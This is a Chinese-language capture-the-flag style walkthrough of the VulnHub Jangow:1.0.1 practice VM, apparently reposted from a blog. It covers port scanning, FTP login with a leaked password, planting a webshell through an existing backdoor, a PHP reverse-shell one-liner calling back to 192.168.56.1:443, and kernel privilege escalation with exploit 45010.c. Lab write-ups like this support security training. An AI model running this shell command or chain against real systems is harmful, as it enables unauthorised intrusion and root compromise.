jangow:1.0.1
日常练习
0x01 信息收集
nmap老规矩扫一扫
192.168.56.118存活,80端口和21端口开着。
逛了一圈没看到什么有价值的信息,爆破一下路径看看。
site目录刚刚看过了,.backup看看是什么
这里面有数据库的账户密码,暂时不知道是用在哪。到这里没有什么有用的了。
0x02 FTP登录
刚刚端扫扫出来的另一个21端口,利用windows的直接在文件路径下键入
ftp://192.168.56.118
这里需要输入账户密码,匿名登陆登不上去,这里用刚刚网页上看到数据库密码
jangow01 abygurl69
登录成功,路径应该是/var/www/,进入html/site下
有一个busque.php文件,。
0x03 后门连接
查看发现是一个后门
利用这个后门再写一个后门(连个蚁剑)
写入成功
尝试连接蚁剑
连接成功
0x04 反弹shell
连个蚁剑方便上传文件,因为直接用nc反弹不了蚁剑,这里只能用php反弹shell,写入shell.php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 443 >/tmp/f");?>
百度到一个反弹shell,这里用443是因为只能用这个端口才能,其他端口做了限制。
在本地开启监听
nc -lvvp 443
然后访问
http://192.168.56.118/site/shell.php
成功反弹shell
0x05 切换用户
可以看看/etc/passwd文件有哪些用户
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false
有一个jangow01用户,jangow01目录下有一个user.txt文件
看着像md5,拿去解密看看
猜测应该是jangow01的密码。
但是这里尝试了jangow01的密码不是解得的密码,于是想到原来数据库密码。
登录成功。
0x06 提升权限
查看一下linux内核版本
uname -a
用kali查看可利用的exp
下载到当前目录
然后利用蚁剑上传到目标主机的tmp目录
编译45010.c文件
编译后得到exp文件,运行
提权成功!查看root目录拿flag
完结撒花!文章来源:https://www.toymoban.com/news/detail-801201.html
0x07 总结
考完试来做做练习(哈哈考试全过开心),简单的练习,好久没做了。文章来源地址https://www.toymoban.com/news/detail-801201.html
到了这里,关于VulnHub Jangow:1.0.1 渗透测试练习详解的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!